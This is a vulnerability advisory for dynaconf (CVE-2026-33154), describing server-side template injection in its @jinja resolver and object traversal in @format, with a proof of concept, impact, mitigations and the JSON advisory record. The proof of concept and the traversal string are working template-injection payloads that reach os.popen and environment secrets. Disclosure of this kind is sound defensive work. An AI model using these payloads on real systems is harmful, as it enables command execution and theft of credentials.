GHSA-PXRR-HQ57-Q35P

Vulnerability from github – Published: 2026-03-18 20:08 – Updated: 2026-04-14 21:59
VLAI?
Summary
dynaconf Affected by Remote Code Execution (RCE) via Insecure Template Evaluation in @jinja Resolver
Details

Summary

Dynaconf is vulnerable to Server-Side Template Injection (SSTI) due to unsafe template evaluation in the @jinja resolver. When the jinja2 package is installed, Dynaconf evaluates template expressions embedded in configuration values without a sandboxed environment.

If an attacker can influence configuration sources such as: environment variables .env files container environment configuration CI/CD secrets they can execute arbitrary OS commands on the host system. In addition, the @format resolver allows object graph traversal, which may expose sensitive runtime objects and environment variables.

Details

The vulnerability arises because Dynaconf's string resolvers lack proper security boundaries.

  1. @jinja Resolver The @jinja resolver renders templates using full Jinja2 evaluation. However, the rendering context is not sandboxed, which allows attackers to access Python's internal attributes. Using objects such as cycler, attackers can reach Python's globals and import the os module.

Example attack path cycler → initglobals → os → popen() This leads to arbitrary command execution.

  1. @format Resolver The @format resolver performs Python string formatting using internal objects. This allows attackers to traverse Python's object graph and access sensitive runtime objects. Example traversal: {this.class.init.globals[os].environ} This can expose
  2. API keys
  3. database credentials
  4. internal service tokens
  5. environment secrets

PoC

import os
from dynaconf import Dynaconf
# Malicious configuration injection
os.environ["DYNACONF_RCE"] = "@jinja {{ cycler.__init__.__globals__.os.popen('id').read() }}"
settings = Dynaconf()
print("[!] Command Execution Result:")
print(settings.RCE)

Impact

Successful exploitation allows attackers to: - Execute arbitrary OS commands on the host system - Access sensitive environment variables - Compromise application secrets - Fully compromise the running application process Because configuration values may originate from CI/CD pipelines, container orchestration systems, or environment injection, this vulnerability can become remotely exploitable in real-world deployments.

Remediation / Mitigation (Examples)

  1. Use Jinja2 sandbox for template rendering
from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
template = env.from_string("{{ config_value }}")
safe_value = template.render(config_value=user_input)```
  1. Restrict @format usage to trusted values
safe_value = "{name}".format(name=trusted_name)
Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.2.12"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "dynaconf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33154"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-78",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T20:08:06Z",
    "nvd_published_at": "2026-03-20T21:17:15Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nDynaconf is vulnerable to Server-Side Template Injection (SSTI) due to unsafe template evaluation in the @jinja resolver.\nWhen the jinja2 package is installed, Dynaconf evaluates template expressions embedded in configuration values without a sandboxed environment.\n\nIf an attacker can influence configuration sources such as:\nenvironment variables\n.env files\ncontainer environment configuration\nCI/CD secrets\nthey can execute arbitrary OS commands on the host system.\nIn addition, the @format resolver allows object graph traversal, which may expose sensitive runtime objects and environment variables.\n\n### Details\nThe vulnerability arises because Dynaconf\u0027s string resolvers lack proper security boundaries.\n\n1. @jinja Resolver\nThe @jinja resolver renders templates using full Jinja2 evaluation.\nHowever, the rendering context is not sandboxed, which allows attackers to access Python\u0027s internal attributes.\nUsing objects such as cycler, attackers can reach Python\u0027s __globals__ and import the os module.\n\nExample attack path\ncycler\n \u2192 __init__\n \u2192 __globals__\n \u2192 os\n \u2192 popen()\nThis leads to arbitrary command execution.\n\n2. @format Resolver\nThe @format resolver performs Python string formatting using internal objects.\nThis allows attackers to traverse Python\u0027s object graph and access sensitive runtime objects.\nExample traversal:\n{this.__class__.__init__.__globals__[os].environ}\nThis can expose\n- API keys\n- database credentials\n- internal service tokens\n- environment secrets\n\n### PoC\n```\nimport os\nfrom dynaconf import Dynaconf\n# Malicious configuration injection\nos.environ[\"DYNACONF_RCE\"] = \"@jinja {{ cycler.__init__.__globals__.os.popen(\u0027id\u0027).read() }}\"\nsettings = Dynaconf()\nprint(\"[!] Command Execution Result:\")\nprint(settings.RCE)\n```\n### Impact\nSuccessful exploitation allows attackers to:\n- Execute arbitrary OS commands on the host system\n- Access sensitive environment variables\n- Compromise application secrets\n- Fully compromise the running application process\nBecause configuration values may originate from CI/CD pipelines, container orchestration systems, or environment injection, this vulnerability can become remotely exploitable in real-world deployments.\n\n\n### Remediation / Mitigation (Examples)\n\n1. Use Jinja2 sandbox for template rendering\n```\nfrom jinja2.sandbox import SandboxedEnvironment\nenv = SandboxedEnvironment()\ntemplate = env.from_string(\"{{ config_value }}\")\nsafe_value = template.render(config_value=user_input)```\n```\n2. Restrict @format usage to trusted values\n```\nsafe_value = \"{name}\".format(name=trusted_name)\n```",
  "id": "GHSA-pxrr-hq57-q35p",
  "modified": "2026-04-14T21:59:25Z",
  "published": "2026-03-18T20:08:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dynaconf/dynaconf/security/advisories/GHSA-pxrr-hq57-q35p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33154"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dynaconf/dynaconf/commit/2fbb45ee36b8c0caa5b924fe19f3c1a5e8603fa7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dynaconf/dynaconf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dynaconf/dynaconf/releases/tag/3.2.13"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "dynaconf Affected by Remote Code Execution (RCE) via Insecure Template Evaluation in @jinja Resolver"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.